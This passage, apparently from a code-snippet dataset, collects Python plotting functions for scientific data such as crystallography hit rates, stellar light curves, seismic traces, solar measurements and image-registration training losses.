time.time()\n total_width = self.GetParent().total_width\n\n newwidth = total_width * (self.GetParent().zoom / 100)\n newmid = total_width * (self.GetParent().pan/100)\n newxmin = newmid - (newwidth/2)\n newxmax = newxmin + newwidth\n\n if newxmin < 0:\n newxmin = 0\n newxmax = newwidth\n elif newxmax > total_width:\n newxmax = total_width\n newxmin = newxmax - newwidth\n\n assert newxmin >= 0 and newxmin <= total_width\n\n #print \"**** Zoom: %s, pan: %s, total_width: %s, newwidth: %s, newmid: %s, newxmin: %s, newxmax: %s\" \\\n # %(self.GetParent().zoom,self.GetParent().pan,total_width,newwidth,newmid,newxmin,newxmax)\n\n left = 0\n width_so_far = 0\n self.figure.clear()\n braggsmax = max(flex.max(r.culled_braggs) for r in runs)\n braggsmin = min(flex.min(r.culled_braggs) for r in runs)\n distsmax = max(flex.max(r.culled_distances) for r in runs)\n distsmin = min(flex.min(r.culled_distances) for r in runs)\n 
sifomax = max(flex.max(r.culled_sifoils) for r in runs)\n sifomin = min(flex.min(r.culled_sifoils) for r in runs)\n wavemax = max(flex.max(r.culled_wavelengths) for r in runs)\n wavemin = min(flex.min(r.culled_wavelengths) for r in runs)\n\n #above tricks don't work for hit rates as they can be empty if the run is new\n goodruns = []\n for run in runs:\n if len(run.hit_rates) > 0: goodruns.append(run)\n if len(goodruns) > 0:\n hitsmax = max(flex.max(r.hit_rates) for r in goodruns)\n hitsmin = min(flex.min(r.hit_rates) for r in goodruns)\n else:\n hitsmax = hitsmin = 0\n\n first_run = True\n for run in runs:\n right = left + run.width()\n\n if right < newxmin or left > newxmax:\n left += run.width()\n #print \"Not showing run %s\"%run.runId\n continue\n\n if left < newxmin:\n xmin = run.min() + (newxmin - left)\n else:\n xmin = run.min()\n\n if right > newxmax:\n xmax = run.min() + (newxmax - left)\n else:\n xmax = run.max()\n\n #print \"Run: %s, run.width(): %s, left: %s, right: %s, run.min(): %s, run.max(): %s, xmin: %s, xmax: %s, width_so_far: %s, xmax-xmin: %s\" \\\n #%(run.runId,run.width(),left,right,run.min(),run.max(),xmin,xmax,width_so_far,xmax-xmin)\n\n ax1 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.05, 0.9*(xmax-xmin)/newwidth, 0.4])\n ax2 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.45, 0.9*(xmax-xmin)/newwidth, 0.2], sharex=ax1)\n ax3 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.65, 0.9*(xmax-xmin)/newwidth, 0.1], sharex=ax1)\n ax4 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.75, 0.9*(xmax-xmin)/newwidth, 0.1], sharex=ax1)\n ax5 = self.figure.add_axes([0.05+(0.9*width_so_far/newwidth), 0.85, 0.9*(xmax-xmin)/newwidth, 0.1], sharex=ax1)\n left += run.width()\n width_so_far += (xmax-xmin)\n\n ax1.grid(True, color=\"0.75\")\n ax2.grid(True, color=\"0.75\")\n ax3.grid(True, color=\"0.75\")\n ax4.grid(True, color=\"0.75\")\n ax5.grid(True, color=\"0.75\")\n ax1.plot(run.culled_bragg_times.select(run.culled_indexed),\n run.culled_braggs.select(run.culled_indexed), 'd', color=[0.0,1.0,0.0])\n ax1.plot(run.culled_bragg_times.select(~run.culled_indexed),\n run.culled_braggs.select(~run.culled_indexed), 'd', color=[0.0,0.5,1.0])\n ax2.plot(run.hit_rates_times, run.hit_rates, 'o-', color=[0.0,1.0,0.0])\n ax3.plot(run.culled_bragg_times, run.culled_wavelengths, '^', color=[0.8,0.0,0.2])\n ax4.plot(run.culled_bragg_times, run.culled_sifoils, '<', color=[0.8,0.0,0.2])\n ax5.plot(run.culled_bragg_times, run.culled_distances, '>', color=[0.8,0.0,0.2])\n ax1.set_ylabel(\"# of Bragg spots\")\n ax2.set_ylabel(\"Hit rate (%)\")\n ax3.set_ylabel(\"WaveL\")\n ax4.set_ylabel(\"SiFoils(mm)\")\n ax5.set_ylabel(\"Dist (mm)\")\n ax1.set_xlim(xmin, xmax)\n ax1.set_ylim(braggsmin, braggsmax)\n ax2.set_ylim(hitsmin, hitsmax)\n ax3.set_ylim(wavemin, wavemax)\n ax4.set_ylim(sifomin-10, sifomax+10)\n ax5.set_ylim(distsmin-3, distsmax+3)\n ax1.set_xlabel(\"Time\")\n for ax in ax1, ax2, ax3, ax4, ax5:\n if (ax is not ax1) :\n for label in ax.get_xticklabels():\n label.set_visible(False)\n ax.get_yticklabels()[0].set_visible(False)\n if not first_run:\n ax.get_yaxis().set_visible(False)\n\n ax1.xaxis.set_major_formatter(ticker.FuncFormatter(status_plot.format_time))\n ax3.yaxis.set_major_formatter(ticker.FormatStrFormatter(\"%.3f\"))\n ax5.yaxis.set_major_formatter(ticker.FormatStrFormatter(\"%.0f\"))\n ax5.set_title(\"%d:%d/%d:%.1f%% I:%d\"%(run.runId, run.hits_count, len(run.braggs), 100*run.hits_count/len(run.braggs),run.indexed.count(True)))\n\n 
labels = ax1.get_xticklabels()\n for label in labels:\n label.set_rotation(30)\n\n first_run = False\n\n self.figure.autofmt_xdate()\n self.canvas.draw()\n self.parent.Refresh()\n\n t2 = time.time()\n print(\"Plotted in %.2fs\" % (t2 - t1))", "def PLOTdetrendPOSITIONfluxFULL(time, flux, position, TCK, **kwargs):\n \n # Calculating the corrections\n # ---------------------------\n fluxCORRECTION = scInterp.splev(position, TCK)\n\n \n # Setting up the figure window\n # ----------------------------\n figPOScorr = pl.figure(figsize=(16,16))\n gsPOScorr = gridspec.GridSpec(2, 2,height_ratios=[1,1], width_ratios=[3,2])\n axTIMEorig = figPOScorr.add_subplot(gsPOScorr[0,0])\t\t\t\t\t\t# Initial flux with time\n axTIMEcorr = figPOScorr.add_subplot(gsPOScorr[1,0], sharex=axTIMEorig, sharey=axTIMEorig)\t\t\t\t\t\t# Corrected flux with time\n axPOSorig = figPOScorr.add_subplot(gsPOScorr[0,1], sharey=axTIMEorig)\t\t\t\t\t\t# Initial flux with position\n axPOScorr = figPOScorr.add_subplot(gsPOScorr[1,1], sharex=axPOSorig, sharey=axTIMEorig)\t\t\t\t\t\t# Corrected flux with position\n \n # Panels related to time\n # ----------------------\n axTIMEorig.plot(time, flux, 'k.', ms=6, alpha=.4)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5) \n axTIMEorig.set_title('Original'); axTIMEorig.set_ylabel('Flux [adu]')\n \n axTIMEcorr.plot(time, flux - fluxCORRECTION, 'k.', ms=6, alpha=.4)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5) \n axTIMEcorr.set_title('After correction'); axTIMEcorr.set_ylabel('Flux [adu]'); axTIMEcorr.set_ylabel('Time [d]')\n # Panels related to position\n # --------------------------------------\n axPOSorig.plot(position, flux, 'k.', ms=6, alpha=.4)\n axPOSorig.plot(position, fluxCORRECTION, 'r.', ms=6, alpha=.8)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5); axPOSorig.set_title('Correction') \n \n axPOScorr.plot(position, flux - fluxCORRECTION, 'k.', ms=6, alpha=.4)\n pl.tick_params('both',length=10,width=2,which='major'); pl.tick_params('both',length=10,width=1,which='minor')\n pyplot.locator_params(axis = 'x', nbins = 5); pyplot.locator_params(axis = 'y', nbins = 5); axPOScorr.set_title('Residuals correction'); axPOScorr.set_ylabel('CCD position [pixel]')\n \n # Settings\n # --------\n axTIMEorig.set_xlim([np.min(time), np.max(time)]); axTIMEorig.set_ylim([np.min(flux)*1.2, np.max(flux)*1.2])\n axPOSorig.set_xlim([np.min(position) + 0.1, np.max(position) + 0.1])\n axTIMEcorr.set_xlabel('Time [d]'); axTIMEorig.set_ylabel('Flux [adu]'); axTIMEcorr.set_ylabel('Flux [adu]'); axPOScorr.set_xlabel('Position [pixel]')\n \n return", "def __plot_T__(self, refresh=False, *args):\n # If plot is not requested, return:\n if not self.plotTeVar.get() or not self.plotTiVar.get():\n return\n\n # Check for a closed window:\n if 'T' in self.plots.keys() and not matplotlib.pyplot.fignum_exists(self.plots['T'].number):\n del self.plots['T']\n refresh = False\n # Update the existing plot, if it exists\n refresh = refresh or 'T' in self.plots.keys()\n if refresh:\n if 'T' in self.plots.keys():\n fig = self.plots['T']\n fig = 
matplotlib.pyplot.figure(fig.number)\n fig.clear()\n else:\n return\n # Make a new window:\n else:\n fig = matplotlib.pyplot.figure(figsize=(4,3))\n fig.canvas.set_window_title('T, time = ' + '{:.3f}'.format(1e9*self.imp.t(self.it)))\n ax = fig.add_subplot(111)\n\n # Plot:\n if self.plotTeVar.get():\n ax.plot(1e4*self.imp.r((self.it), self.ir)[0], self.imp.Te((self.it), self.ir)[0], 'r-', label='e')\n if self.plotTiVar.get():\n ax.plot(1e4*self.imp.r((self.it), self.ir)[0], self.imp.Ti((self.it), self.ir)[0], 'b-', label='i')\n\n ax.set_xlabel('r (um)', fontsize=12)\n ax.set_ylabel('T (keV)', fontsize=12)\n ax.legend()\n\n if self.logxVar.get():\n ax.set_xscale('log')\n if self.logyVar.get():\n ax.set_yscale('log')\n\n matplotlib.pyplot.tight_layout()\n\n if not refresh:\n fig.show()\n fig.canvas.draw()\n if self.wm is not None:\n self.wm.addWindow(matplotlib.pyplot.get_current_fig_manager().window)\n self.plots['T'] = fig", "def plot_true(self, with_clutter = False):\n \n if self.data_generated:\n \n # Choosing a different color for each target\n n_targets = len(self.true_data['targets'])\n cmap = plt.get_cmap('gnuplot')\n colors = [cmap(i) for i in np.linspace(0, 0.9, n_targets)]\n\n # Plot of the ground truth X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1)\n if with_clutter and self.r:\n for k in self.observed_data.keys():\n plt.plot(self.observed_data[k][0], self.observed_data[k][1], 'kx', markersize=1)\n \n for i in self.true_data['targets']:\n plt.plot(self.true_data['all_y'][i][:,0],self.true_data['all_y'][i][:,1],\\\n 'x',label=\"observed track %s\" %i,color=colors[i])\n plt.plot(self.true_data['all_x'][i][:,0],self.true_data['all_x'][i][:,2],\\\n 'o-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n #plt.legend(loc='best')\n\n # self.timeline is a list where self.timeline[i] is the list of time steps\n # at which target i is alive\n #self.timeline = []\n #for i in self.true_data['targets']:\n # if i in self.true_data['disappear_time'].keys():\n # self.timeline.append(np.arange(self.true_data['birth_time'][i],self.true_data['disappear_time'][i],1))\n # else:\n # self.timeline.append(np.arange(self.true_data['birth_time'][i],41,1))\n\n # Plot of the ground truth time vs X\n plt.subplot(1,3,2)\n if with_clutter and self.r:\n for k in self.observed_data.keys(): \n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][0], 'kx', markersize=1)\n \n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_y'][i][:,0],\\\n 'x',label=\"observed track %s\" %i,color=colors[i])\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,0],\\\n 'o-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n\n # Plot of the ground truth time vs Y\n plt.subplot(1,3,3)\n if with_clutter and self.r:\n for k in self.observed_data.keys():\n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][1], 'kx', markersize=1)\n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_y'][i][:,1],\\\n 'x',label=\"observed track %s\" %i,color=colors[i])\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,2],\\\n 'o-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n plt.show();\n\n elif 
self.data_given:\n raise ValueError(\"Cannot plot true positions if y_obs is given because the true x are not known.\")\n else:\n raise ValueError(\"No data to plot !\")", "def plot_skeleton(project_dir, part):\n scene_fpath = os.path.join(project_dir, 'scene_sba.json')\n print(scene_fpath)\n K_arr, D_arr, R_arr, t_arr, _ = utils.load_scene(scene_fpath)\n D_arr = D_arr.reshape((-1,4))\n\n print(f\"\\n\\n\\nLoading data\")\n df_paths = sorted(glob.glob(os.path.join(project_dir, '*.h5')))\n #print(df_paths)\n\n points_2d_df = utils.create_dlc_points_2d_file(df_paths)\n triangulate_func = calib.triangulate_points_fisheye\n points_2d_filtered_df = points_2d_df[points_2d_df['likelihood']>0.5]\n points_3d_df = calib.get_pairwise_3d_points_from_df(points_2d_filtered_df, K_arr, D_arr, R_arr, t_arr, triangulate_func)\n\n # estimate initial points\n nose_pts = points_3d_df[points_3d_df[\"marker\"]==part][[\"x\", \"y\", \"z\", \"frame\"]].values\n x_slope, x_intercept, *_ = stats.linregress(nose_pts[:,3], nose_pts[:,0])\n y_slope, y_intercept, *_ = stats.linregress(nose_pts[:,3], nose_pts[:,1])\n z_slope, z_intercept, *_ = stats.linregress(nose_pts[:,3], nose_pts[:,2])\n frame_est = np.arange(100)\n x_est = frame_est*x_slope + x_intercept\n y_est = frame_est*y_slope + y_intercept\n z_est = frame_est*z_slope + z_intercept\n psi_est = np.arctan2(y_slope, x_slope)\n \n #print(points_2d_df)\n #print(points_2d_df[points_2d_df['frame']==160])\n #return([nose_pts[:,0], nose_pts[:,1], nose_pts[:,2]])\n return(x_est, y_est, z_est)", "def data_vis():\n dataroot = 'solar_data.txt'\n debug = False \n diff = False\n X, y = read_data(dataroot, debug, diff)\n\n # First plot the original timeseries\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(y)\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(X[:,0])\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(X[:,1])\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(X[:,2])\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(X[:,3])\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(X[:,4])\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(X[:,5])\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##########################################################################################\n # Plotting the Fourier Transform of the signals\n\n freq = np.fft.fftfreq(len(y), 1*60*60)\n\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(freq, np.abs(np.fft.fft(y)))\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(freq, np.abs(np.fft.fft(X[:,0])))\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(freq, np.abs(np.fft.fft(X[:,1])))\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(freq, np.abs(np.fft.fft(X[:,2])))\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(freq, np.abs(np.fft.fft(X[:,3])))\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(freq, np.abs(np.fft.fft(X[:,4])))\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(freq, np.abs(np.fft.fft(X[:,5])))\n plt.title('Avg Avg Wind 
Speed @ 6ft [m/s]')\n # plt.show()\n\n ##################################################################################################\n # Print correlation matrix\n\n df = pd.DataFrame(np.c_[y, X])\n df.columns = ['Avg Global PSP (vent/cor) [W/m^2]','Avg Zenith Angle [degrees]','Avg Azimuth Angle [degrees]','Avg Tower Dry Bulb Temp [deg C]','Avg Tower RH [%]','Avg Total Cloud Cover [%]','Avg Avg Wind Speed @ 6ft [m/s]']\n f = plt.figure(figsize=(19, 15))\n plt.matshow(df.corr(), fignum=f.number)\n plt.xticks(range(df.shape[1]), df.columns, fontsize=14, rotation=20)\n plt.yticks(range(df.shape[1]), df.columns, fontsize=14)\n cb = plt.colorbar()\n cb.ax.tick_params(labelsize=14)\n plt.title('Correlation Matrix', fontsize=16);\n plt.show()", "def plot_individual_tm(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n print str(item[\"path_id\"])\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n fig_title = yprop + item[\"cation_type\"] # Plot by cation\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111)\n ax.scatter(x,y, s=70, zorder=2, color=tm_color_dict[item[\"tm_type\"][0]], linewidths=2.5, edgecolors='black',\n label=item[\"tm_type\"][0])\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]], linestyle='dashed')\n else:\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([7,22])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def generate_plots(fixed, moving, warped, flows, train_loss, val_loss, reg_loss, epoch):\n moving = moving.detach().cpu().numpy()\n fixed = fixed.detach().cpu().numpy()\n warped = [w.detach().cpu().numpy() for w in warped]\n flows = [f.detach().cpu().numpy() for f in flows]\n\n fig = plt.figure(constrained_layout=True, figsize=(4 * 5, 4 * 3))\n ax_dict = fig.subplot_mosaic(\"\"\"\n FABCD\n LGHIE\n MKJWX\n \"\"\")\n\n ax_dict['F'].imshow(moving[0, 0, ...], cmap='gray')\n ax_dict['F'].set_title('Moving')\n\n ax_dict['W'].imshow(fixed[0, 0, ...], cmap='gray')\n ax_dict['W'].set_title('Fixed')\n\n for i, ax_name in enumerate(list(\"ABCDEX\")):\n ax_dict[ax_name].imshow(warped[i][0, 0, ...], cmap='gray')\n if ax_name == \"A\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n ax_dict['L'].plot(train_loss, color='red', label='train_loss')\n ax_dict['L'].plot(val_loss, label='val_loss', color='blue')\n ax_dict['L'].plot(reg_loss, label='train_reg_loss', color='green')\n ax_dict['L'].set_title(\"Losses\")\n ax_dict['L'].grid()\n ax_dict['L'].set_xlim(0, args.e)\n ax_dict['L'].legend(loc='upper right')\n 
ax_dict['L'].scatter(len(train_loss) - 1, train_loss[-1], s=20, color='red')\n ax_dict['L'].scatter(len(val_loss) - 1, val_loss[-1], s=20, color='blue')\n ax_dict['L'].scatter(len(reg_loss) - 1, reg_loss[-1], s=20, color='green')\n\n for i, ax_name in enumerate(list(\"GHIJKM\")):\n plot_grid(ax_dict[ax_name], flows[i][0, ...])\n if ax_name == \"G\":\n ax_dict[ax_name].set_title(\"Affine\")\n else:\n ax_dict[ax_name].set_title(f\"Cascade {i}\")\n\n plt.suptitle(f\"Epoch {epoch}\")\n plt.savefig(f'./ckp/visualization/epoch_{epoch}.png')", "def fig_event_corrected(evstream, TF_list, fmin=1./150., fmax=2.):\n\n # Unpack vertical trace and filter\n trZ = evstream.trZ.copy()\n trZ.filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n sr = trZ.stats.sampling_rate\n taxis = np.arange(0., trZ.stats.npts/sr, 1./sr)\n\n plt.figure(figsize=(8, 8))\n\n plt.subplot(611)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['Z1']:\n tr = Trace(\n data=evstream.correct['Z1'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.key + ' ' + evstream.tstamp +\n ': Z1', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(612)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['Z2-1']:\n tr = Trace(\n data=evstream.correct['Z2-1'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': Z2-1', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(613)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZP-21']:\n tr = Trace(\n data=evstream.correct['ZP-21'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZP-21', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(614)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZH']:\n tr = Trace(\n data=evstream.correct['ZH'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZH', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(615)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZP-H']:\n tr = Trace(\n data=evstream.correct['ZP-H'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZP-H', fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.subplot(616)\n plt.plot(\n taxis, trZ.data, 'lightgray', lw=0.5)\n if TF_list['ZP']:\n tr = Trace(\n data=evstream.correct['ZP'],\n header=trZ.stats).filter(\n 'bandpass', freqmin=fmin, freqmax=fmax, corners=2, zerophase=True)\n plt.plot(taxis, tr.data, 'k', lw=0.5)\n plt.title(evstream.tstamp + ': ZP', 
fontdict={'fontsize': 8})\n plt.gca().ticklabel_format(axis='y', style='sci', useOffset=True,\n scilimits=(-3, 3))\n plt.xlim((0., trZ.stats.npts/sr))\n\n plt.xlabel('Time since earthquake (sec)')\n plt.tight_layout()\n\n return plt", "def demo(self, tmin=0, tmax=27.4, cadence=30.0 / 60.0 / 24.0, offset=0, raw=False, ax=None):\n t = np.arange(tmin, tmax, cadence)\n if ax is None:\n plt.figure('demo', figsize=(8, 3))\n else:\n plt.sca(ax)\n y = self.model(t)\n if raw:\n plt.plot(t, y + offset, alpha=0.25, linewidth=1, color='royalblue')\n plt.plot(t, self.integrated(t) + offset, alpha=0.5, linewidth=1, color='darkorange')\n plt.xlim(tmin, tmax)\n # plt.ylim(np.max(y)+0.01, np.min(y)-0.01)\n plt.xlabel('Time (days)')\n plt.ylabel('Flux (mag.)')", "def plot():\n pass", "def plot(self, *filters, output=\"lightcurve.png\", title=None, \n tmerger=None, show_legend=True, connect=True, text=None,\n mag_min=None, mag_max=None, \n limmag_min=None, limmag_max=None, \n refmag_min=None, refmag_max=None):\n \n if (len(self.__mags) == 0) and (len(self.__lim_mags) == 0):\n raise ValueError(\"LightCurve object has no magnitude or limiting \"+\n \"magnitude data points; cannot plot\")\n \n plotted_filts = [] # keep track of filters which have been plot already\n \n self.__mags.sort(\"MJD\")\n self.__lim_mags.sort(\"MJD\")\n self.__ref_mags.sort(\"MJD\")\n \n ## plot magnitudes and their errors\n if len(self.__mags) > 0:\n sources = self.__mags \n \n if filters: # if a filters argument is given\n mask = (sources[\"filter\"] == filters[0])\n for filt in filters[1:]:\n mask += (sources[\"filter\"] == filt)\n sources = sources[mask] # only use those filters \n # if limits on magnitudes \n if mag_min:\n sources = sources[sources[\"mag_calib\"] < mag_min]\n if mag_max:\n sources = sources[sources[\"mag_calib\"] > mag_max] \n \n if tmerger: # if a t=0 is given\n t = [tim - tmerger for tim in sources[\"MJD\"].data]\n else:\n t = sources[\"MJD\"].data\n \n # magnitudes and their errors\n mag = sources[\"mag_calib\"].data\n mag_err = sources[\"mag_calib_unc\"].data\n \n # plot them \n fig = plt.figure(figsize=(14,10))\n for i in range(len(t)): \n filt = str(sources[\"filter\"].data[i])\n color, form = self.__plot_instructions[filt]\n if filt in plotted_filts:\n plt.errorbar(t[i], mag[i], mag_err[i], fmt=form, mfc=color, \n mec=\"black\", mew=2.0, ls=\"\", color=\"black\", \n ms=18.0, zorder=4)\n else:\n plt.errorbar(t[i], mag[i], mag_err[i], fmt=form, mfc=color, \n mec=\"black\", mew=2.0, ls=\"\", color=\"black\", \n label=filt, ms=18.0, zorder=4)\n plotted_filts.append(filt)\n \n if connect:\n for f in plotted_filts:\n mask = self.__mags[\"filter\"] == f\n color, __ = self.__plot_instructions[f]\n trelevant = np.array(t)[mask]\n magrelevant = np.array(mag)[mask]\n plt.plot(trelevant, magrelevant, marker=\"\", ls=\"-\", \n lw=2.0, zorder=0, color=color, alpha=0.6)\n \n ## plot limiting magnitudes \n if len(self.__lim_mags) > 0:\n lims = self.__lim_mags\n \n if filters: # if a filters argument is given\n mask = (lims[\"filter\"] == filters[0])\n for filt in filters[1:]:\n mask += (lims[\"filter\"] == filt)\n lims = lims[mask] # only use those filters\n\n # if limits on limiting magnitudes \n if limmag_min:\n lims = lims[lims[\"mag_calib\"] < limmag_min]\n if limmag_max:\n lims = lims[lims[\"mag_calib\"] > limmag_max] \n\n if tmerger: # if a t=0 is given\n t = [tim - tmerger for tim in lims[\"MJD\"].data]\n else:\n t = lims[\"MJD\"].data\n \n # limiting magnitudes\n mag = lims[\"mag_calib\"].data\n \n # plot them\n for 
i in range(len(lims)): \n filt = str(lims[\"filter\"].data[i])\n color, form = self.__plot_instructions_lim_mags[filt]\n if filt in plotted_filts:\n plt.plot(t[i], mag[i], marker=form, mfc=color, mec=\"black\", \n mew=2.0, ls=\"\", ms=24.0, zorder=3) \n else:\n plt.plot(t[i], mag[i], marker=form, mfc=color, mec=\"black\", \n mew=2.0, ls=\"\", label=filt, ms=24.0, zorder=3) \n plotted_filts.append(filt) \n\n ## plot reference magnitudes \n if len(self.__ref_mags) > 0:\n refs = self.__ref_mags\n \n if filters: # if a filters argument is given\n mask = (refs[\"filter\"] == filters[0])\n for filt in filters[1:]:\n mask += (refs[\"filter\"] == filt)\n refs = refs[mask] # only use those filters\n\n # if limits on reference magnitudes \n if refmag_min:\n refs = refs[refs[\"mag_calib\"] < refmag_min]\n if refmag_max:\n refs = refs[refs[\"mag_calib\"] > refmag_max] \n \n if tmerger: # if a t=0 is given\n t = [tim - tmerger for tim in refs[\"MJD\"].data]\n else:\n t = refs[\"MJD\"].data\n \n # refence magnitudes and their errors\n mag = refs[\"mag_calib\"].data\n mag_err = refs[\"mag_calib_unc\"].data\n \n # plot them \n for i in range(len(t)): \n filt = str(refs[\"filter\"].data[i])\n color = self.__plot_instructions_ref_mags[filt]\n if filt in plotted_filts:\n plt.axhline(mag[i], color=color, ls=\"-\", lw=3.0, zorder=2)\n else:\n plt.axhline(mag[i], color=color, ls=\"-\", lw=3.0,\n label=filt, zorder=2)\n \n if mag_err[i]:\n x0, xf = plt.xlim()\n rect = ptc.Rectangle([x0, mag[i]-mag_err[i]], \n width=xf-x0, height=2.0*mag_err[i],\n alpha=0.2, color=color,\n zorder=1)\n plt.gca().add_patch(rect)\n plotted_filts.append(filt) \n \n\n\n ## show the legend\n if show_legend:\n # remove duplicate labels/handles \n handles, labels = plt.gca().get_legend_handles_labels()\n temp_dict = dict(zip(labels, handles))\n # reorder labels from shortest wavelength to longest \n 